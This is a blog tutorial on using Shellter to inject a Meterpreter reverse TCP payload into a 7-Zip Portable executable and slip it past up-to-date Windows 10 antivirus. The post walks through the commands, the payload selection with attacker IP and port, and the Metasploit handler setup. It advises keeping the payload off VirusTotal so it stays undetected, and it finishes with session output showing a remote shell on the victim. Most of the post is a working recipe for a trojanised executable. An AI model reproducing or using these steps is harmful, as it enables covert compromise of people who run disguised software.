metalkey — Posts tagged "av-evasion"

Shellter – The ultimate tool for AV evasion

July 01, 2016 — metalkey

Shellter Website - https://www.shellterproject.com/

Attacker: Kali Linux
Victim: Windows 10 (fully patched, fully updated antivirus)

Introduction

Shellter is a tool for injecting dynamic shellcode into win32 exe’s. The shellcode can be yours, or something you generate via a 3rd party framework such as Metasploit.
Shellter preserves the original structure of the target executable and can be used in either Automatic or Manual mode. It can also be used to create encoded/self-decrypting payloads.

In this tutorial, we will cover the automatic mode of operation.

Installation

You can either download and install Shellter from the Shellter Website or install using apt-get in Kali:




root@kali:~$ apt-get update && apt-get install shellter

Payload Creation

Start shellter and select [A] for automatic mode, then select your target .exe file.




root@kali:~$ shellter

Choose Operation Mode - Auto/Manual (A/M/H): A

PE Target: /root/Downloads/7-ZipPortable.exe

On the payload menu, select [L] then [1] for MeterpreterReverseTCP.
Enter your IP address and port you wish to use the payload on.
Note: If you select Stealth Mode, you must set [exitfunc] to [thread] in Metasploit.




************

* Payloads *

************



[1] Meterpreter_Reverse_TCP

[2] Meterpreter_Reverse_HTTP

[3] Meterpreter_Reverse_HTTPS

[4] Meterpreter_Bind_TCP

[5] Shell_Reverse_TCP

[6] Shell_Bind_TCP

[7] WinExec



Use a listed payload or custom? (L/C/H): L

Select payload by index: 1

SET LHOST: 192.168.1.162

SET LPORT: 4321

Shellter will now encode and obfuscate the payload.
When the process is complete, hit [Enter] to exit.

At this point you can either use the checkvt script from Veil Evasion (https://www.veil-framework.com/how-to-safely-check-veil-payloads-against-virustotal/) or Mubix’s vt-notify script (https://github.com/mubix/vt-notify) to safely check the payload against Virus Total. Alternatively, use the virus scanner of your target system to confirm the payload is undetectable. DO NOT upload your exe to Virus Total.

Exploitation




root@kali:~$ msfconsole

msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.1.162

msf exploit(handler) > set lport 4321

msf exploit(handler) > exploit

Run the payload on your Victim machine




C:\7-ZipPortable>7-ZipPortable.exe

Back in Kali, a Meterpreter session will open and you now have a reverse shell to your victim Windows 10 machine.




[*] Meterpreter session 1 opened (192.168.1.162:4321 -> 192.168.1.11:49627) at 2015-10-05 00:39:33 +1100



meterpreter > shell

Process 3788 created.

Channel 1 created.

Microsoft Windows [Version 10.0.10240]

(c) 2015 Microsoft Corporation. All rights reserved.



C:\7-ZipPortable>

Tags: av-evasion